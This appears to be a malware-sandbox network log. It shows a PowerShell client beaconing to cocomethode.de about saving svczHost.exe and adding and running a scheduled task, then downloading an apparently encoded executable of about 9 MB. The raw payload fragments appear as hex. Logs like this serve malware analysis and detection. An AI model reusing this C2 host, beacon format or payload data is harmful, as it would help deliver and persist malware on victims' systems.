2024-12-11 11:44:30 UTC	1369	IN	Data Raw: 00 c2 49 8a d1 e8 8c d2 25 01 49 8c 04 47 e9 4f 01 49 8c 0c 36 e9 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 71 d2 25 01 49 8c 04 38 e9 4f 01 49 8c 0c 2b e9 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 52 d2 25 01 49 8c 04 35 e9 4f 01 49 8c 0c 24 e9 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 37 d2 25 01 49 8c 04 3e e9 4f 01 49 8c 0c 31 e9 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 18 d2 25 01 49 8c 04 4b e9 4f 01 49 8c 0c 3a e9 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 fd d3 25 01 49 8c 04 4c e9 4f 01 49 8c 0c 3f e9 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 de d3 25 01 49 8c 04 59 e9 4f 01 49 8c 0c 48 e9 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 c3 d3 25 01 49 8c 04 7a e9 4f 01 49 8c 0c 6d e9 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 a4 d3 25 01 49 8c 04 a7 e9 4f 01 49 8c 0c 96 e9 4f Data Ascii: I%IGOI6OI8tIq%I8OI+OI8tIR%I5OI$OI8tI7%I>OI1OI8tI%IKOI:OI8tI%ILOI?OI8tI%IYOIHOI8tI%IzOImOI8tI%IOIO
2024-12-11 11:44:30 UTC	1161	IN	Data Raw: 3b cf 25 01 49 8c 04 b2 eb 4f 01 49 8c 0c a5 eb 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 1c cf 25 01 49 8c 04 f7 f3 4f 01 49 8c 0c e6 f3 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 01 cf 25 01 49 8c 04 18 f2 4f 01 49 8c 0c 0b f2 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 e2 cc 25 01 49 8c 04 85 f2 4f 01 49 8c 0c 74 f2 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 c7 cc 25 01 49 8c 04 9e 76 90 01 49 8a 01 49 8c 0c cc db 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 87 cc 25 01 49 8c 04 86 76 90 01 49 8a 01 49 8c 0c b4 db 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 67 cc 25 01 49 8c 04 6e 76 90 01 49 8a 01 49 8c 0c cc db 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 47 cc 25 01 49 8c 04 5e 76 90 01 49 8a 01 49 8c 0c c4 db 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 27 cc 25 01 49 8c 04 46 76 90 01 Data Ascii: ;%IOIOI8tI%IOIOI8tI%IOIOI8tI%IOItOI8tI%IvIIOI8tI%IvIIOI8tIg%InvIIOI8tIG%I^vIIOI8tI'%IFv
2024-12-11 11:44:30 UTC	1369	IN	Data Raw: 49 82 38 01 74 00 c2 49 8a d1 e8 87 c8 25 01 49 8c 04 ae 74 90 01 49 8a 01 49 8c 0c 4c db 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 67 c8 25 01 49 8c 04 96 74 90 01 49 8a 01 49 8c 0c 34 db 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 47 c8 25 01 49 8c 04 86 74 90 01 49 8a 01 49 8c 0c 24 db 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 27 c8 25 01 49 8c 04 76 74 90 01 49 8a 01 49 8c 0c 0c db 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 07 c8 25 01 49 8c 04 66 74 90 01 49 8a 01 49 8c 0c f4 d8 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 e7 c9 25 01 49 8c 04 4e 74 90 01 49 8a 01 49 8c 0c dc d8 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 c7 c9 25 01 49 8c 04 36 74 90 01 49 8a 01 49 8c 0c c4 d8 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 a7 c9 25 01 49 8c 04 26 74 90 01 49 8a 01 49 8c 0c ac d8 4f Data Ascii: I8tI%ItIILOI8tIg%ItII4OI8tIG%ItII$OI8tI'%IvtIIOI8tI%IftIIOI8tI%INtIIOI8tI%I6tIIOI8tI%I&tIIO
2024-12-11 11:44:30 UTC	1369	IN	Data Raw: 49 8c 0c fc d7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 27 c5 25 01 49 8c 04 d6 73 90 01 49 8a 01 49 8c 0c e4 d7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 07 c5 25 01 49 8c 04 be 73 90 01 49 8a 01 49 8c 0c cc d7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 e7 c2 25 01 49 8c 04 a6 73 90 01 49 8a 01 49 8c 0c b4 d7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 c7 c2 25 01 49 8c 04 8e 73 90 01 49 8a 01 49 8c 0c 9c d7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 a7 c2 25 01 49 8c 04 76 73 90 01 49 8a 01 49 8c 0c 84 d7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 87 c2 25 01 49 8c 04 5e 73 90 01 49 8a 01 49 8c 0c 6c d7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 67 c2 25 01 49 8c 04 46 73 90 01 49 8a 01 49 8c 0c 54 d7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 47 c2 25 01 49 8c 04 2e 73 90 01 49 8a Data Ascii: IOI8tI'%IsIIOI8tI%IsIIOI8tI%IsIIOI8tI%IsIIOI8tI%IvsIIOI8tI%I^sIIlOI8tIg%IFsIITOI8tIG%I.sI
2024-12-11 11:44:30 UTC	1369	IN	Data Raw: fe 6e 90 01 49 8a 01 49 8c 0c 44 d7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 c7 bf 25 01 49 8c 04 e6 6e 90 01 49 8a 01 49 8c 0c 3c d7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 a7 bf 25 01 49 8c 04 ce 6e 90 01 49 8a 01 49 8c 0c 2c d7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 87 bf 25 01 49 8c 04 c6 6e 90 01 49 8a 01 49 8c 0c 14 d7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 67 bf 25 01 49 8c 04 b6 6e 90 01 49 8a 01 49 8c 0c 04 d7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 47 bf 25 01 49 8c 04 ae 6e 90 01 49 8a 01 49 8c 0c ec d4 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 27 bf 25 01 49 8c 04 9e 6e 90 01 49 8a 01 49 8c 0c d4 d4 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 07 bf 25 01 49 8c 04 96 6e 90 01 49 8a 01 49 8c 0c bc d4 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 e7 bc 25 01 49 8c Data Ascii: nIIDOI8tI%InII<OI8tI%InII,OI8tI%InIIOI8tIg%InIIOI8tIG%InIIOI8tI'%InIIOI8tI%InIIOI8tI%I
2024-12-11 11:44:30 UTC	1369	IN	Data Raw: 87 b8 25 01 49 8c 04 86 6f 90 01 49 8a 01 49 8c 0c 0c d2 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 67 b8 25 01 49 8c 04 a6 6f 90 01 49 8a 01 49 8c 0c f4 d3 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 47 b8 25 01 49 8c 04 a6 6f 90 01 49 8a 01 49 8c 0c e4 d3 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 27 b8 25 01 49 8c 04 8e 6f 90 01 49 8a 01 49 8c 0c d4 d3 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 07 b8 25 01 49 8c 04 7e 6f 90 01 49 8a 01 49 8c 0c bc d3 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 e7 b9 25 01 49 8c 04 76 6f 90 01 49 8a 01 49 8c 0c a4 d3 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 c7 b9 25 01 49 8c 04 6e 6f 90 01 49 8a 01 49 8c 0c 8c d3 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 a7 b9 25 01 49 8c 04 56 6f 90 01 49 8a 01 49 8c 0c 74 d3 4f 01 49 82 38 01 74 00 c2 49 8a d1 Data Ascii: %IoIIOI8tIg%IoIIOI8tIG%IoIIOI8tI'%IoIIOI8tI%I~oIIOI8tI%IvoIIOI8tI%InoIIOI8tI%IVoIItOI8tI
2024-12-11 11:44:30 UTC	1369	IN	Data Raw: 74 00 c2 49 8a d1 e8 27 b5 25 01 49 8c 04 8e 6a 90 01 49 8a 01 49 8c 0c 74 ce 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 07 b5 25 01 49 8c 04 76 6a 90 01 49 8a 01 49 8c 0c 6c ce 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 e7 b2 25 01 49 8c 04 5e 6a 90 01 49 8a 01 49 8c 0c 54 ce 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 c7 b2 25 01 49 8c 04 46 6a 90 01 49 8a 01 49 8c 0c 3c ce 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 a7 b2 25 01 49 8c 04 2e 6a 90 01 49 8a 01 49 8c 0c 24 ce 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 87 b2 25 01 49 8c 04 1e 6a 90 01 49 8a 01 49 8c 0c 0c ce 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 67 b2 25 01 49 8c 04 06 6a 90 01 49 8a 01 49 8c 0c 1c ce 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 47 b2 25 01 49 8c 04 ee 6b 90 01 49 8a 01 49 8c 0c 04 ce 4f 01 49 82 38 Data Ascii: tI'%IjIItOI8tI%IvjIIlOI8tI%I^jIITOI8tI%IFjII<OI8tI%I.jII$OI8tI%IjIIOI8tIg%IjIIOI8tIG%IkIIOI8

Timestamp	Bytes transferred	Direction	Data
2024-12-11 11:44:41 UTC	285	OUT	POST /609aafcaa17aae4dc51ce49a2e84612a74368b57fc4b8bec450f6e5cff9596ba823aa52afa40a80c45020b00110eac9c HTTP/1.1 Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: cocomethode.de Content-Length: 200
2024-12-11 11:44:41 UTC	200	OUT	Data Raw: 5b 0d 0a 20 20 20 20 22 5c 22 44 6f 77 6e 6c 6f 61 64 20 63 6f 6d 70 6c 65 74 65 64 3a 20 43 3a 5c 5c 5c 5c 57 69 6e 64 6f 77 73 5c 5c 5c 5c 54 65 6d 70 5c 5c 5c 5c 66 69 6c 65 5c 22 22 2c 0d 0a 20 20 20 20 22 5c 22 54 68 65 20 66 69 6c 65 20 43 3a 5c 5c 5c 5c 57 69 6e 64 6f 77 73 5c 5c 5c 5c 54 65 6d 70 5c 5c 5c 5c 66 69 6c 65 20 77 61 73 20 70 72 6f 63 65 73 73 65 64 20 61 6e 64 20 73 61 76 65 64 20 61 73 20 43 3a 5c 5c 5c 5c 57 69 6e 64 6f 77 73 5c 5c 5c 5c 54 65 6d 70 5c 5c 5c 5c 73 76 63 7a 48 6f 73 74 2e 65 78 65 5c 22 22 2c 0d 0a 20 20 20 20 22 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 22 0d 0a 5d Data Ascii: [ "\"Download completed: C:\\\\Windows\\\\Temp\\\\file\"", "\"The file C:\\\\Windows\\\\Temp\\\\file was processed and saved as C:\\\\Windows\\\\Temp\\\\svczHost.exe\"", "----------"]
2024-12-11 11:44:41 UTC	1196	IN	HTTP/1.1 200 OK Date: Wed, 11 Dec 2024 11:44:41 GMT Content-Length: 0 Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qQGr3PC61R7F1UgdlDSZaVT63%2BM9uVcgHnhDrjGmsgL8Z0nAckLo%2BrdlkUmagmdQCXiJ18aWx34QK2ZCeKgZgHUYLjhRQ%2BgYyyXrwFq7Hj6rXV2UM%2Fa79cnUFXUIzhp5NLc%2Fny8Ygc1A"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=5241&min_rtt=1002&rtt_var=8390&sent=17&recv=19&lost=0&retrans=0&sent_bytes=3536&recv_bytes=10284&delivery_rate=2637759&cwnd=254&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" X-Powered-By: ARR/3.0 Server: cloudflare CF-RAY: 8f053963199bbd46-ATL server-timing: cfL4;desc="?proto=TCP&rtt=47&min_rtt=39&rtt_var=15&sent=12&recv=14&lost=0&retrans=0&sent_bytes=27417&recv_bytes=3108&delivery_rate=1336387755&cwnd=210&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" server-timing: cfL4;desc="?proto=TCP&rtt=61&min_rtt=61&rtt_var=18&sent=6&recv=8&lost=0&retrans=0&sent_bytes=19381&recv_bytes=1994&delivery_rate=1039412698&cwnd=113&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
2024-12-11 11:44:41 UTC	430	IN	Data Raw: 73 65 72 76 65 72 2d 74 69 6d 69 6e 67 3a 20 63 66 4c 34 3b 64 65 73 63 3d 22 3f 70 72 6f 74 6f 3d 54 43 50 26 72 74 74 3d 33 39 26 6d 69 6e 5f 72 74 74 3d 33 37 26 72 74 74 5f 76 61 72 3d 31 35 26 73 65 6e 74 3d 35 26 72 65 63 76 3d 37 26 6c 6f 73 74 3d 30 26 72 65 74 72 61 6e 73 3d 30 26 73 65 6e 74 5f 62 79 74 65 73 3d 36 31 32 32 26 72 65 63 76 5f 62 79 74 65 73 3d 31 33 36 30 26 64 65 6c 69 76 65 72 79 5f 72 61 74 65 3d 31 35 32 32 38 36 30 34 36 35 26 63 77 6e 64 3d 31 31 33 26 75 6e 73 65 6e 74 5f 62 79 74 65 73 3d 30 26 63 69 64 3d 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 26 74 73 3d 30 26 78 3d 30 22 0d 0a 73 65 72 76 65 72 2d 74 69 6d 69 6e 67 3a 20 63 66 4c 34 3b 64 65 73 63 3d 22 3f 70 72 6f 74 6f 3d 54 43 50 26 72 74 74 3d 31 31 33 39 Data Ascii: server-timing: cfL4;desc="?proto=TCP&rtt=39&min_rtt=37&rtt_var=15&sent=5&recv=7&lost=0&retrans=0&sent_bytes=6122&recv_bytes=1360&delivery_rate=1522860465&cwnd=113&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"server-timing: cfL4;desc="?proto=TCP&rtt=1139

Timestamp	Bytes transferred	Direction	Data
2024-12-11 11:44:42 UTC	284	OUT	POST /609aafcaa17aae4dc51ce49a2e84612a74368b57fc4b8bec450f6e5cff9596ba823aa52afa40a80c45020b00110eac9c HTTP/1.1 Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: cocomethode.de Content-Length: 97
2024-12-11 11:44:42 UTC	97	OUT	Data Raw: 5b 0d 0a 20 20 20 20 22 5c 22 44 65 74 65 6c 65 20 46 69 6c 65 20 43 3a 5c 5c 5c 5c 57 69 6e 64 6f 77 73 5c 5c 5c 5c 54 65 6d 70 5c 5c 5c 5c 66 69 6c 65 5c 22 22 2c 0d 0a 20 20 20 20 22 5c 22 61 64 64 20 74 61 73 6b 5c 22 22 2c 0d 0a 20 20 20 20 22 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 22 0d 0a 5d Data Ascii: [ "\"Detele File C:\\\\Windows\\\\Temp\\\\file\"", "\"add task\"", "----------"]
2024-12-11 11:44:42 UTC	1214	IN	HTTP/1.1 200 OK Date: Wed, 11 Dec 2024 11:44:42 GMT Content-Length: 0 Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lDPwKnvRyyynDs3J29vhv%2F6He%2BbwY0fZRdL53isxXMib0F71P63GHuvuamIrWzkGRPXj2iiKVqZCkM84JsIxC7RWr26cbT212RsEw1SEDIBnHjOvdXqYY9eTiCpOaEcJRaXC%2FNof7RlA"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=10521&min_rtt=988&rtt_var=13186&sent=5894&recv=2640&lost=0&retrans=0&sent_bytes=8408231&recv_bytes=33656&delivery_rate=49742976&cwnd=272&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" X-Powered-By: ARR/3.0 Server: cloudflare CF-RAY: 8f053968a8274569-ATL server-timing: cfL4;desc="?proto=TCP&rtt=60&min_rtt=20&rtt_var=13&sent=317&recv=293&lost=0&retrans=0&sent_bytes=8358683&recv_bytes=1231&delivery_rate=3274150000&cwnd=125&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" server-timing: cfL4;desc="?proto=TCP&rtt=113912&min_rtt=113885&rtt_var=24066&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2836&recv_bytes=1041&delivery_rate=33611&cwnd=252&unsent_bytes=0&cid=e95e45e9a3747aec&ts=842&x=0"

Timestamp	Bytes transferred	Direction	Data
2024-12-11 11:44:44 UTC	284	OUT	POST /609aafcaa17aae4dc51ce49a2e84612a74368b57fc4b8bec450f6e5cff9596ba823aa52afa40a80c45020b00110eac9c HTTP/1.1 Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: cocomethode.de Content-Length: 64
2024-12-11 11:44:44 UTC	64	OUT	Data Raw: 5b 0d 0a 20 20 20 20 22 5c 22 72 75 6e 20 74 61 73 6b 5c 22 22 2c 0d 0a 20 20 20 20 22 5c 22 6b 65 74 20 74 68 75 63 5c 22 22 2c 0d 0a 20 20 20 20 22 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 22 0d 0a 5d Data Ascii: [ "\"run task\"", "\"ket thuc\"", "----------"]
2024-12-11 11:44:45 UTC	1209	IN	HTTP/1.1 200 OK Date: Wed, 11 Dec 2024 11:44:45 GMT Content-Length: 0 Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FlZTlTlTXRzI2z009eNeNVPQ49drsOV%2FpQKRao%2BW6vXjXpldZYvSEkLawEvRKlauSDpmj9IIo8OR5Qb324vs8285V7u2nBrDEzmKACdBOgdGEV6GA66g5GVp64xxcaAO%2FjVfGCty2ykk"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=18515&min_rtt=1002&rtt_var=28107&sent=23&recv=25&lost=0&retrans=0&sent_bytes=5078&recv_bytes=12101&delivery_rate=2637759&cwnd=255&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" X-Powered-By: ARR/3.0 Server: cloudflare CF-RAY: 8f053979e9736740-ATL server-timing: cfL4;desc="?proto=TCP&rtt=57&min_rtt=20&rtt_var=14&sent=332&recv=307&lost=0&retrans=0&sent_bytes=8358486&recv_bytes=1210&delivery_rate=3274150000&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" server-timing: cfL4;desc="?proto=TCP&rtt=113822&min_rtt=113789&rtt_var=24054&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2834&recv_bytes=1008&delivery_rate=33632&cwnd=252&unsent_bytes=0&cid=9efe8ac32162100b&ts=585&x=0"

Timestamp	Bytes transferred	Direction	Data
2024-12-11 11:45:35 UTC	64	OUT	GET /StaticFile/RdpService/38 HTTP/1.1 Host: cocomethode.de
2024-12-11 11:45:35 UTC	1348	IN	HTTP/1.1 200 OK Date: Wed, 11 Dec 2024 11:45:35 GMT Content-Type: application/octet-stream Content-Length: 9429504 Connection: close content-disposition: attachment; filename=image; filename*=UTF-8''image hash: 5641F3A5B9787F23D3D34F0D9F791B7A CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uXy72qnCAi7A6TapiblAmrFpYDw5pK7F6Mft6rJsehRfUaui%2B6AUjhFMvK9si9nkU8JUluIv4w3pem4Eb4gSjhP0YEbtdd2Q0K4h5IVoZlVX4eGuDfulysZ8r7dGOIg%2FSp8%2Fj3teQMNB"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=24981&min_rtt=1101&rtt_var=30940&sent=13&recv=15&lost=0&retrans=0&sent_bytes=4628&recv_bytes=5249&delivery_rate=2584070&cwnd=236&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" X-Powered-By: ARR/3.0 Server: cloudflare CF-RAY: 8f053ab3097d53c3-ATL server-timing: cfL4;desc="?proto=TCP&rtt=57&min_rtt=55&rtt_var=19&sent=9&recv=11&lost=0&retrans=0&sent_bytes=1986&recv_bytes=1726&delivery_rate=1129017241&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" server-timing: cfL4;desc="?proto=TCP&rtt=42&min_rtt=41&rtt_var=18&sent=6&recv=8&lost=0&retrans=0&sent_bytes=1186&recv_bytes=965&delivery_rate=1235528301&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
2024-12-11 11:45:35 UTC	624	IN	Data Raw: 73 65 72 76 65 72 2d 74 69 6d 69 6e 67 3a 20 63 66 4c 34 3b 64 65 73 63 3d 22 3f 70 72 6f 74 6f 3d 54 43 50 26 72 74 74 3d 34 33 26 6d 69 6e 5f 72 74 74 3d 34 33 26 72 74 74 5f 76 61 72 3d 32 31 26 73 65 6e 74 3d 31 26 72 65 63 76 3d 33 26 6c 6f 73 74 3d 30 26 72 65 74 72 61 6e 73 3d 30 26 73 65 6e 74 5f 62 79 74 65 73 3d 30 26 72 65 63 76 5f 62 79 74 65 73 3d 33 32 36 26 64 65 6c 69 76 65 72 79 5f 72 61 74 65 3d 30 26 63 77 6e 64 3d 32 33 37 26 75 6e 73 65 6e 74 5f 62 79 74 65 73 3d 30 26 63 69 64 3d 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 26 74 73 3d 30 26 78 3d 30 22 0d 0a 73 65 72 76 65 72 2d 74 69 6d 69 6e 67 3a 20 63 66 4c 34 3b 64 65 73 63 3d 22 3f 70 72 6f 74 6f 3d 54 43 50 26 72 74 74 3d 34 38 26 6d 69 6e 5f 72 74 74 3d 34 37 26 72 74 74 Data Ascii: server-timing: cfL4;desc="?proto=TCP&rtt=43&min_rtt=43&rtt_var=21&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=326&delivery_rate=0&cwnd=237&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"server-timing: cfL4;desc="?proto=TCP&rtt=48&min_rtt=47&rtt
2024-12-11 11:45:35 UTC	766	IN	Data Raw: 6b 7c b6 26 25 26 26 26 22 26 26 26 d9 d9 26 26 9e 26 26 26 26 26 26 26 66 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 27 26 26 28 39 9c 28 26 92 2f eb 07 9e 27 6a eb 07 72 4e 4f 55 06 56 54 49 41 54 47 4b 06 45 47 48 48 49 52 06 44 43 06 54 53 48 06 4f 48 06 62 69 75 06 4b 49 42 43 08 2b 2b 2c 02 26 26 26 26 26 26 26 c8 cb 10 06 8c aa 7e 55 8c aa 7e 55 8c aa 7e 55 85 d2 ed 55 82 aa 7e 55 fc 2b 7f 54 9b aa 7e 55 8c aa 7f 55 0a ab 7e 55 9c 2e 7d 54 9f aa 7e 55 9c 2e 7a 54 b5 aa 7e 55 c4 2f 7b 54 8f aa 7e 55 fc 2b 7a 54 8e aa 7e 55 8c aa 7e 55 8d aa 7e 55 9c 2e 7b 54 fa aa 7e 55 c4 2f 7e 54 8d aa 7e 55 c4 2f 7c 54 8d aa 7e 55 74 4f 45 4e 8c aa 7e 55 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 Data Ascii: k\|&%&&&"&&&&&&&&&&&&f&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&'&&(9(&/'jrNOUVTIATGKEGHHIRDCTSHOHbiuKIBC++,&&&&&&&~U~U~UU~U+T~UU~U.}T~U.zT~U/{T~U+zT~U~U~U.{T~U/~T~U/\|T~UtOEN~U&&&&&&&&&&&&&&&
2024-12-11 11:45:35 UTC	1369	IN	Data Raw: 26 26 94 23 26 26 26 36 88 26 26 20 26 26 26 e0 a9 26 26 26 26 26 26 26 26 26 26 26 26 26 66 26 26 66 08 54 43 4a 49 45 26 26 6a 32 26 26 26 06 88 26 26 30 26 26 26 ea a9 26 26 26 26 26 26 26 26 26 26 26 26 26 66 26 26 64 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 Data Ascii: &&#&&&6&& &&&&&&&&&&&&&&&&f&&fTCJIE&&j2&&&&&0&&&&&&&&&&&&&&&&f&&d&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
2024-12-11 11:45:35 UTC	1369	IN	Data Raw: 2b 9a b6 7e 26 6e a5 1f 26 53 27 e5 6e ad f6 cf 13 f0 0e 26 6e ab 23 d8 b6 7e 26 6e ab 2b c9 b6 7e 26 6e a5 1f 26 53 27 e5 6e ad f6 cf 3e f0 0e 26 6e ab 23 27 b7 7e 26 6e ab 2b d4 b6 7e 26 6e a5 1f 26 53 27 e5 6e ad f6 cf dd f3 0e 26 6e ab 23 32 b7 7e 26 6e ab 2b 23 b7 7e 26 6e a5 1f 26 53 27 e5 6e ad f6 cf f8 f3 0e 26 6e ab 23 21 b7 7e 26 6e ab 2b de b6 7e 26 6e a5 1f 26 53 27 e5 6e ad f6 cf e7 f3 0e 26 6e ab 23 34 b7 7e 26 6e ab 2b 25 b7 7e 26 6e a5 1f 26 53 27 e5 6e ad f6 cf 82 f3 0e 26 6e ab 23 2b b7 7e 26 6e ab 2b d8 b6 7e 26 6e a5 1f 26 53 27 e5 6e ad f6 cf a1 f3 0e 26 6e ab 23 6e b7 7e 26 6e ab 2b 1f b7 7e 26 6e a5 1f 26 53 27 e5 6e ad f6 cf 4c f3 0e 26 6e ab 23 1d b7 7e 26 6e ab 2b 0a b7 7e 26 6e a5 1f 26 53 27 e5 6e ad f6 cf 6b f3 0e 26 6e ab 23 Data Ascii: +~&n&S'n&n#~&n+~&n&S'n>&n#'~&n+~&n&S'n&n#2~&n+#~&n&S'n&n#!~&n+~&n&S'n&n#4~&n+%~&n&S'n&n#+~&n+~&n&S'n&n#n~&n+~&n&S'nL&n#~&n+~&n&S'nk&n#
2024-12-11 11:45:35 UTC	1369	IN	Data Raw: a5 1f 26 53 27 e5 6e ad f6 cf c4 f6 0e 26 6e ab 23 ad b5 7e 26 6e ab 2b 5a b5 7e 26 6e a5 1f 26 53 27 e5 6e ad f6 cf e3 f6 0e 26 6e ab 23 58 b5 7e 26 6e ab 2b 49 b5 7e 26 6e a5 1f 26 53 27 e5 6e ad f6 cf 8e f6 0e 26 6e ab 23 87 b5 7e 26 6e ab 2b b4 b5 7e 26 6e a5 1f 26 53 27 e5 6e ad f6 cf ad f6 0e 26 6e ab 23 e2 b5 7e 26 6e ab 2b 93 b5 7e 26 6e a5 1f 26 53 27 e5 6e ad f6 cf 48 f6 0e 26 6e ab 23 91 b5 7e 26 6e ab 2b 8e b5 7e 26 6e a5 1f 26 53 27 e5 6e ad f6 cf 77 f6 0e 26 6e ab 23 f4 b5 7e 26 6e ab 2b e5 b5 7e 26 6e a5 1f 26 53 27 e5 6e ad f6 cf 12 f6 0e 26 6e ab 23 63 b2 7e 26 6e ab 2b 10 b2 7e 26 6e a5 1f 26 53 27 e5 6e ad f6 cf 31 f6 0e 26 6e ab 23 66 b2 7e 26 6e ab 2b 17 b2 7e 26 6e a5 1f 26 53 27 e5 6e ad f6 cf dc e9 0e 26 6e ab 23 65 b2 7e 26 6e ab Data Ascii: &S'n&n#~&n+Z~&n&S'n&n#X~&n+I~&n&S'n&n#~&n+~&n&S'n&n#~&n+~&n&S'nH&n#~&n+~&n&S'nw&n#~&n+~&n&S'n&n#c~&n+~&n&S'n1&n#f~&n+~&n&S'n&n#e~&n
